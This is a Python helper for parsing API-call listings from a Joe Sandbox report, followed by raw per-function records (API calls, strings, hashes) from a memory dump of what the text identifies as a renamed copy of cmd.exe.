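"""Parse the "APIs" listing of a Joe Sandbox function record into structured calls."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied from the report's APIs listing for the function
# that reads the DisableCMD policy value (addresses are the report's own; the
# subset chosen here is mine).
SAMPLE_LINES = """\
• GetConsoleOutputCP.KERNELBASE ref: 001A0AA3
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001A0AB4
• exit.KERNELBASE ref: 001A0ADA
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 001AE9E1
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001AE9EA
  • Part of subcall function 001A1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,001AEF7C,?,00000000,00000000), ref: 001A1FB2
  • Part of subcall function 001987CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(001B7460,00000001), ref: 0019881B
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 001A01DB
• _setjmp3.MSVCRT ref: 001AEA5E
"""

# One report line: optional bullet, optional subcall prefix, API.MODULE, optional
# "(args)", then "ref: <call-site address>".  The API name may contain '?', '@'
# and '_' (decorated CRT exports such as ??_V@YAXPAX@Z), so it is anything up to
# the first '.'; the module is anything up to '(' or whitespace.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.]+)\.(?P<module>[^\s(,]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# The disassembler prints recovered immediates as 8 hex digits (negative ones
# with a leading '-'); anything else in the argument list is a string it could
# resolve, e.g. a registry value name.  An 8-hex-digit string literal would be
# misclassified, which is acceptable for triage.
LITERAL_RE = re.compile(r"-?[0-9A-Fa-f]{8}")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                 # call-site address inside the dumped image
    subcall: Optional[str]   # caller address when the report marks the line as a subcall

    @property
    def direct(self) -> bool:
        return self.subcall is None


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per line that matches the listing format; skip headings."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def string_args(call: ApiCall) -> list:
    """Arguments that are neither '?' (unresolved) nor a hex immediate."""
    return [a for a in call.args if a != "?" and not LITERAL_RE.fullmatch(a)]


def registry_value_lookups(calls) -> list:
    """(api, value-name) pairs for Reg* calls whose argument list carries a string."""
    return [(c.api, s) for c in calls if c.api.startswith("Reg") for s in string_args(c)]


def module_histogram(calls) -> Counter:
    """How many calls resolve into each module (api-ms-win-* forwarders kept as-is)."""
    return Counter(c.module for c in calls)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    print(f"{len(parsed)} calls, {sum(c.direct for c in parsed)} direct")
    print("registry value lookups:", registry_value_lookups(parsed))
    print("modules:", dict(module_histogram(parsed)))
```

The strings attached to this record (DisableCMD under Software\Policies\Microsoft\Windows\System) and to the next one ($P$G, COMSPEC, PATHEXT, PROMPT, \CMD.EXE) are the ones cmd.exe itself uses at startup, which is consistent with the report's "Drops or copies cmd.exe with a different name" signature rather than with malware-authored code; treat the parsed calls in this dump as the renamed shell's own behaviour when building detections.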

Control-flow Graph (rendered graph omitted): entry 1a00e9; basic blocks 1a00e9-1a01f3 and 1ae615-1ae734; blocks call memset, GetModuleFileNameW, ??_V@YAXPAX@Z, exit, _wcsupr, _wcsicmp and the internal subroutines 19e3f0, 1a1e70, 19ec2e, 19a976, 19a62f, 198bc7, 1a6b30, 1a01f5, 19fc40.
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A011A
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 001A0156
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001BE590,00002000,?,001D8BF0,00000000,?,?,00198F0D), ref: 0019EC51
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019EC77
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019EC8D
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECA3
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECB9
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECCF
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECE5
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECF7
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ED0D
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 001A01DB
                                                                                                                                                                                                                          • exit.MSVCRT ref: 001AE621
                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 001AE683
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001AE71A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                          • API String ID: 2336066422-4197029667
                                                                                                                                                                                                                          • Opcode ID: a513a040e7af555d2024386eae6c41245f459fa96e3fb77615215998d9c53ad6
                                                                                                                                                                                                                          • Instruction ID: cc0a0b414fa8415d759dbc61141ce78e6078cb5673f15207862e1d95d4518c55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a513a040e7af555d2024386eae6c41245f459fa96e3fb77615215998d9c53ad6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60512839B002169BDF18DB60CD95AFE77A5EF66304F444869E80AE7280EF70DE41CB91

Control-flow Graph (rendered graph omitted): entry 198bc7; basic blocks 198bc7-198e9c and 1ab5d4-1ab781; blocks call GetCurrentDirectoryW, towupper, iswalpha, GetFullPathNameW, GetFileAttributesW, SetCurrentDirectoryW, GetLastError, _local_unwind4 and the internal subroutines 1a7d90, 1a5a2e, 19e3f0, 19acb0, 1a61e6, 1a7d82, 1a0207, 19a976, 198e9e, 198e7f.
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A5A2E: memset.MSVCRT ref: 001A5A5A
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000,?,00000104,?), ref: 00198C7A
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00198C8F
                                                                                                                                                                                                                          • iswalpha.MSVCRT ref: 00198CA4
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00198CC4
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00198CF0
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00198D93
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00198DE0
                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00198E11
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001AB6AB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1133067188-0
                                                                                                                                                                                                                          • Opcode ID: 924aaf27c35e8ea2b3fbc609c9aa85f4577fe865661c66516a3fb8f7ab12f02c
                                                                                                                                                                                                                          • Instruction ID: 8d309dc2ca68e20796151a6f6fd0160ad6edf42a1f5749782617e4eb23867b87
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924aaf27c35e8ea2b3fbc609c9aa85f4577fe865661c66516a3fb8f7ab12f02c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35B1E035A082558ADF28EFA4CD95BFDB3B4EF16310F59416AE41AE31D1EB309E80CB51

Control-flow Graph: function at 0019E310 (graph rendering omitted)

APIs
• _get_osfhandle.MSVCRT ref: 0019E318
• SetConsoleMode.KERNELBASE(00000000), ref: 0019E322
• _get_osfhandle.MSVCRT ref: 0019E32F
• GetConsoleMode.KERNELBASE(00000000), ref: 0019E339
• _get_osfhandle.MSVCRT ref: 0019E35E
• GetConsoleMode.KERNELBASE(00000000), ref: 0019E368
• _get_osfhandle.MSVCRT ref: 0019E390
• SetConsoleMode.KERNELBASE(00000000), ref: 0019E39A
• _get_osfhandle.MSVCRT ref: 0019E3C7
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0019E3D1
• _get_osfhandle.MSVCRT ref: 001ADC35
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001ADC3F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID: CMD.EXE
• API String ID: 1606018815-3025314500
• Opcode ID: 849958ada580edd0a344c8a097a79c245a6477df6d9cefd0f9127258900a3147
• Instruction ID: 50138d9931a005537641ea4e1e0d5545c619a4358ffbf2c4d838bfcae90f5f2d
• Opcode Fuzzy Hash: 849958ada580edd0a344c8a097a79c245a6477df6d9cefd0f9127258900a3147
• Instruction Fuzzy Hash: 962171B0A02300AFDB14DB34EC1FBA63BA4BF00715B484529F507D7AA1DBB5E9948F56

Control-flow Graph: function at 001959C0 (graph rendering omitted)

APIs
• memset.MSVCRT ref: 00195A10
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00195A53
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 00195A70
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00195A87
  • Part of subcall function 001A0B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001A0B40
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00195AA1
• CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00195B09
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00195B13
• CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00195B70
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001A9B7C
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
• String ID:
• API String ID: 402963468-0
• Opcode ID: 247cefdb9619c4dbb3340c4296f9a072f5a1405b1ff2714d3113528ba2a39097
• Instruction ID: b0d5137b88a7188f6bbed34b039b5d39165f13d147d5b32c6a5f1435a01a8668
• Opcode Fuzzy Hash: 247cefdb9619c4dbb3340c4296f9a072f5a1405b1ff2714d3113528ba2a39097
• Instruction Fuzzy Hash: 5691F535A016169BEF29DB65DC85BBBB7B6FF89310F5440AAE50AE7180E7708DC0C760

Control-flow Graph: function at 001A6903 (graph rendering omitted)

APIs
• Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,001BCA98,0000000C), ref: 001A6940
• _amsg_exit.MSVCRT ref: 001A6955
• _initterm.MSVCRT ref: 001A69A9
• __IsNonwritableInCurrentImage.LIBCMT ref: 001A69D5
• exit.MSVCRT ref: 001A6A1C
• _XcptFilter.MSVCRT ref: 001A6A2E
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
• String ID:
• API String ID: 796493780-0
• Opcode ID: b2bae9717c556ff03662cd6feed94a04ff33fb77cab668435ab505f11a6c92e8
• Instruction ID: 1dc495a63f97f4fb484fd45601f9f54845d5cd14d1b8eb734e70530db1ca06cc
• Opcode Fuzzy Hash: b2bae9717c556ff03662cd6feed94a04ff33fb77cab668435ab505f11a6c92e8
• Instruction Fuzzy Hash: AD31D67E645311DFEB269F68ED456AA37E0FB46738F240229F50697AE0DB7098C0CB41

Control-flow Graph: function at 0019E2AF (graph rendering omitted)

APIs
• SetThreadUILanguage.KERNELBASE ref: 0019E2C6
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,0019B952), ref: 0019E2D9
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(76F70000,SetThreadUILanguage,00000000,0019B952), ref: 0019E2F9
• SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,0019B952), ref: 001ADC08
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Thread$AddressHandleLanguageLocaleModuleProc
• String ID: KERNEL32.DLL$SetThreadUILanguage
• API String ID: 1264603166-2530943252
• Opcode ID: 7b7a956f3cfa34f6c781071c06de6c7da2f18d5e2a119f24450481730f6285a1
• Instruction ID: 046c2bd6bcb6016019343e37a1c46bb23c83a1c0ef8006a4e4cce95fdd4fe7a8
• Opcode Fuzzy Hash: 7b7a956f3cfa34f6c781071c06de6c7da2f18d5e2a119f24450481730f6285a1
• Instruction Fuzzy Hash: E9F05E31A02720ABCE10EB74FD0DA993B94FB15B31B590756F815E3AE0C7749C818AA1

Control-flow Graph
(graph rendering not reproduced)
APIs
• GetConsoleTitleW.KERNELBASE(?,00000104,91B40133,00000001,?), ref: 0019ADB6
  • Part of subcall function 001A5A2E: memset.MSVCRT ref: 001A5A5A
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• towupper.MSVCRT ref: 0019B0E3
  • Part of subcall function 0019E950: memset.MSVCRT ref: 0019E9A0
  • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019E9FC
  • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019EA14
  • Part of subcall function 0019E950: _wcsicmp.MSVCRT ref: 0019EA80
• wcschr.MSVCRT ref: 0019AED2
• wcsncmp.MSVCRT ref: 0019B016
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
  • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 001ACC6C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001ACCCB
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
• String ID:
• API String ID: 4198873954-0
• Opcode ID: 497a7c315daf09ccc951c6097160109167f328f22bf097ddd374952f78312e94
• Instruction ID: 31af84877a138813a551ad1bb472e597bbf721a9a0e3423d00341734fcc1bada
• Opcode Fuzzy Hash: 497a7c315daf09ccc951c6097160109167f328f22bf097ddd374952f78312e94
• Instruction Fuzzy Hash: 10B18875A042118BCF28AF28DD957BE73B0EF51700F550169E90B976D1EB309D89C7D2

Control-flow Graph
(graph rendering not reproduced)
APIs
• GetConsoleOutputCP.KERNELBASE(001A0A41), ref: 001A1F1A
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001A1F2B
• memset.MSVCRT ref: 001A1F45
• GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 001AF185
• memset.MSVCRT ref: 001AF1FB
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$ConsoleInfoLocaleOutputThread
• String ID:
• API String ID: 1263632223-0
• Opcode ID: d477916382639a5416bef4dfbc5e619b4f42100b2099827703cf7c0e4581666b
• Instruction ID: 4e63d5b374e820056d71233fc28c3a42763676fdaebd3f112820bef08816ebf3
• Opcode Fuzzy Hash: d477916382639a5416bef4dfbc5e619b4f42100b2099827703cf7c0e4581666b
• Instruction Fuzzy Hash: 351148B9809353ADDB345B54DC0AF793B94AB12304F44013FE4AA665D4D7B4CDC78299

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0019A9C5), ref: 0019A9D8
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0019A9F3
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0019A9FA
                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0019AA09
                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0019AA12
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 429350006-0

Control-flow Graph: function at 0019E3F0 (graph image with executed / not-executed block legend not reproduced)
APIs
• memset.MSVCRT ref: 0019E455
• ??_V@YAXPAX@Z.MSVCRT(?,00195F21,-00000001), ref: 001ADC6C
Strings
• onecore\base\cmd\maxpathawarestring.cpp, xrefs: 001ADC57
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset
• String ID: onecore\base\cmd\maxpathawarestring.cpp
• API String ID: 2221118986-3416068913
APIs
• _callnewh.MSVCRT ref: 001A7437
  • Part of subcall function 001A74D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(001A77EC,00000001), ref: 001A74E7
• malloc.MSVCRT ref: 001A7444
• _CxxThrowException.MSVCRT(?,001BCBF8), ref: 001A77F5
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ??0exception@@ExceptionThrow_callnewhmalloc
• String ID:
• API String ID: 813871643-0
APIs
• memset.MSVCRT ref: 00195EFB
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
  • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
  • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
  • Part of subcall function 001A0060: wcschr.MSVCRT ref: 001A006C
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00195FF7
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: wcschr$memset$CurrentDirectoryiswspace
• String ID:
• API String ID: 4234405029-0
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset
• String ID: COMSPEC
• API String ID: 2221118986-1631433037
APIs
• __EH_prolog3_catch.LIBCMT ref: 001A6E37
  • Part of subcall function 001A742D: malloc.MSVCRT ref: 001A7444
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: H_prolog3_catchmalloc
• String ID:
• API String ID: 125873668-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
